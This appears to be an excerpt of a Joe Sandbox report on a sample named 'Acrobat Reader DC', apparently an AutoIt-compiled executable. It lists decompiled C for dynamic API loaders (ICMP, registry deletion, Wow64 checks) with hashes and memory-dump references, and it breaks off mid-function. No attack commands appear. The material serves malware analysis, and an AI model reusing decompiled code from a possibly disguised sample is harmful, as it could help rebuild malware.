                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: AU3_GetPluginDetails
                                  • API String ID: 145871493-4132174516
                                  • Opcode ID: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                  • Opcode Fuzzy Hash: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                  • String ID: crts
                                  • API String ID: 943502515-3724388283
                                  • Opcode ID: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                  • Opcode Fuzzy Hash: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004312CC(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("ICMP.DLL");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "IcmpCloseHandle");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x004312d0
                                  0x004312d7
                                  0x004312de
                                  0x004312e4
                                  0x004312e8
                                  0x004312f0
                                  0x004312f6
                                  0x00000000
                                  0x004312f6
                                  0x004312e8
                                  0x004312fb

                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                  • API String ID: 2574300362-3530519716
                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004312FE(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("ICMP.DLL");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "IcmpCreateFile");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00431302
                                  0x00431309
                                  0x00431310
                                  0x00431316
                                  0x0043131a
                                  0x00431322
                                  0x00431328
                                  0x00000000
                                  0x00431328
                                  0x0043131a
                                  0x0043132d

                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCreateFile
                                  • API String ID: 2574300362-275556492
                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043129A(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("ICMP.DLL");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "IcmpSendEcho");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x0043129e
                                  0x004312a5
                                  0x004312ac
                                  0x004312b2
                                  0x004312b6
                                  0x004312be
                                  0x004312c4
                                  0x00000000
                                  0x004312c4
                                  0x004312b6
                                  0x004312c9

                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpSendEcho
                                  • API String ID: 2574300362-58917771
                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430C7F(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("advapi32.dll");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "RegDeleteKeyExW");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00430c83
                                  0x00430c8a
                                  0x00430c91
                                  0x00430c97
                                  0x00430c9b
                                  0x00430ca3
                                  0x00430ca9
                                  0x00000000
                                  0x00430ca9
                                  0x00430c9b
                                  0x00430cae

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430DC1(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("kernel32.dll");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "GetSystemWow64DirectoryW");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00430dc5
                                  0x00430dcc
                                  0x00430dd3
                                  0x00430dd9
                                  0x00430ddd
                                  0x00430de5
                                  0x00430deb
                                  0x00000000
                                  0x00430deb
                                  0x00430ddd
                                  0x00430df0

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                  • API String ID: 2574300362-1816364905
                                  • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                  • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                  • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                  • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430E7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430E7B(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("kernel32.dll");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "GetModuleHandleExW");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00430e7f
                                  0x00430e86
                                  0x00430e8d
                                  0x00430e93
                                  0x00430e97
                                  0x00430e9f
                                  0x00430ea5
                                  0x00000000
                                  0x00430ea5
                                  0x00430e97
                                  0x00430eaa

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetModuleHandleExW$kernel32.dll
                                  • API String ID: 2574300362-199464113
                                  • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                  • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
                                  • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                  • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EF60(struct HINSTANCE__** __esi) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				if(__esi[2] == 0) {
					_t3 = LoadLibraryA("kernel32.dll");
					 *__esi = _t3;
					if(_t3 != 0) {
						_t4 = GetProcAddress(_t3, "IsWow64Process");
						__esi[2] = _t4;
						return _t4;
					}
				}
				return _t3;
			}





                                  0x0040ef64
                                  0x0040ef6b
                                  0x0040ef71
                                  0x0040ef75
                                  0x0040ef7d
                                  0x0040ef83
                                  0x00000000
                                  0x0040ef83
                                  0x0040ef75
                                  0x0040ef86

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E5C8), ref: 0040EF6B
                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsWow64Process$kernel32.dll
                                  • API String ID: 2574300362-3024904723
                                  • Opcode ID: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                  • Instruction ID: 8a5e235981a70bd178cc672d1476e78975e513144aeeb8d5c54acf6a3c23c6fb
                                  • Opcode Fuzzy Hash: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                  • Instruction Fuzzy Hash: DCD0C9B4A00B03EAD7301F72DA1870A76E4AB10781F204C3EBC81E5290DBBCC0808B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EFD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EFD0(struct HINSTANCE__** __esi) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				if(__esi[2] == 0) {
					_t3 = LoadLibraryA("kernel32.dll");
					 *__esi = _t3;
					if(_t3 != 0) {
						_t4 = GetProcAddress(_t3, "GetNativeSystemInfo");
						__esi[2] = _t4;
						return _t4;
					}
				}
				return _t3;
			}





                                  0x0040efd4
                                  0x0040efdb
                                  0x0040efe1
                                  0x0040efe5
                                  0x0040efed
                                  0x0040eff3
                                  0x00000000
                                  0x0040eff3
                                  0x0040efe5
                                  0x0040eff6

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E620), ref: 0040EFDB
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EFED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                  • API String ID: 2574300362-192647395
                                  • Opcode ID: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                  • Instruction ID: faea892368b665db3229cc6598da919ac71bc07d19fee151484258049274b373
                                  • Opcode Fuzzy Hash: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                  • Instruction Fuzzy Hash: DAD092B4900B03AAD7301F22D91860A76A4AB00781B204C2EA981E5290DEB880809B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00451D2B(char _a4, intOrPtr _a8, WCHAR* _a12, WCHAR** _a16) {
				WCHAR* _v8;
				char _v12;
				WCHAR* _v16;
				char _v20;
				char _v24;
				void* __esi;
				intOrPtr* _t137;
				signed int _t140;
				intOrPtr* _t141;
				intOrPtr* _t146;
				signed int _t148;
				char _t149;
				intOrPtr* _t150;
				signed int _t153;
				intOrPtr* _t166;
				intOrPtr* _t169;
				intOrPtr* _t174;
				intOrPtr* _t177;
				signed int _t179;
				intOrPtr* _t180;
				intOrPtr* _t183;
				intOrPtr* _t190;
				char _t192;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr* _t198;
				signed int _t200;
				intOrPtr* _t201;
				intOrPtr* _t205;
				WCHAR** _t218;
				signed int _t220;
				signed int _t222;
				char _t227;
				signed int _t231;
				signed int _t232;
				intOrPtr* _t235;
				intOrPtr _t237;
				intOrPtr* _t238;
				short* _t241;
				intOrPtr* _t243;
				intOrPtr* _t247;
				char _t248;
				intOrPtr _t252;
				WCHAR* _t254;
				signed int _t271;
				signed int _t274;
				char _t288;
				intOrPtr _t306;
				WCHAR* _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed short _t311;
				signed int* _t312;
				signed short _t313;
				signed int _t314;
				void* _t315;

				_t137 = _a4;
				_t218 = _a16;
				_t306 = _a8;
				_t218[3] = 0;
				_a4 = 0;
				 *_t218 = 0;
				_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x10))))(_t137, 0, 0x800,  &_a4);
				if(_t310 >= 0) {
					_t140 = E00430EDF( &_a4, 0);
					__eflags = _t140;
					if(_t140 == 0) {
						_t141 = _a4;
						_v8 = 0;
						_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0xc))))(_t141,  &_v12);
						__eflags = _t310;
						if(_t310 < 0) {
							goto L1;
						} else {
							_t227 = _v12;
							__eflags =  *((intOrPtr*)(_t227 + 0x28)) - 3;
							if( *((intOrPtr*)(_t227 + 0x28)) != 3) {
								L12:
								_t146 = _a4;
								_v20 = 0xffffffff;
								_t148 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x28))))(_t146,  &_a12, 1,  &_v20);
								__eflags = _t148;
								if(_t148 >= 0) {
									L15:
									_t149 = _v12;
									_t311 = 0;
									__eflags = 0 -  *((intOrPtr*)(_t149 + 0x2c));
									if(0 >=  *((intOrPtr*)(_t149 + 0x2c))) {
										goto L30;
									} else {
										while(1) {
											_t166 = _a4;
											_t308 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x14))))(_t166, _t311 & 0x0000ffff,  &_v8);
											__eflags = _t308;
											if(_t308 < 0) {
												break;
											}
											_t247 = _v8;
											__eflags =  *(_t247 + 0x10) & 0x00000003;
											if(( *(_t247 + 0x10) & 0x00000003) == 0) {
												L19:
												_t174 = _a4;
												 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x50))))(_t174, _t247);
												_t248 = _v12;
												_t311 = 1 + _t311;
												_v8 = 0;
												__eflags = _t311 -  *((intOrPtr*)(_t248 + 0x2c));
												if(_t311 <  *((intOrPtr*)(_t248 + 0x2c))) {
													continue;
												} else {
													goto L30;
												}
											} else {
												__eflags =  *_t247 - _v20;
												if( *_t247 == _v20) {
													goto L30;
												} else {
													goto L19;
												}
											}
											goto L51;
										}
										_t169 = _a4;
										 *((intOrPtr*)( *((intOrPtr*)( *_t169 + 0x4c))))(_t169, _v12);
										E00430EAD( &_a4);
										return _t308;
									}
								} else {
									_t177 = _a4;
									_t313 = 0;
									_v16 = 0;
									_t179 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x1c))))(_t177, _t306,  &_v16, 1,  &_v24);
									__eflags = _t179;
									if(_t179 < 0) {
										_t288 = _v12;
										__eflags = 0 -  *((intOrPtr*)(_t288 + 0x2c));
										if(0 >=  *((intOrPtr*)(_t288 + 0x2c))) {
											L30:
											_t150 = _a4;
											 *((intOrPtr*)( *((intOrPtr*)( *_t150 + 0x4c))))(_t150, _v12);
											_t153 = _v8;
											_t307 = 0;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L8;
											} else {
												_t231 =  *(_t153 + 0x18) & 0x0000ffff;
												__eflags = _t231 - 0x20;
												if(_t231 <= 0x20) {
													 *_t218 = 1;
													_v16 = 0;
													__eflags = 0 - _t231;
													if(0 < _t231) {
														_t104 =  &(_t218[4]); // 0x47984c
														_t312 = _t104;
														do {
															_t237 =  *((intOrPtr*)(_t153 + 8));
															_t274 =  *(_t237 + _t307 + 4) & 0x0000ffff;
															_t238 = _t237 + _t307;
															 *_t312 = _t274;
															__eflags = _t274 - 0x1a;
															if(_t274 == 0x1a) {
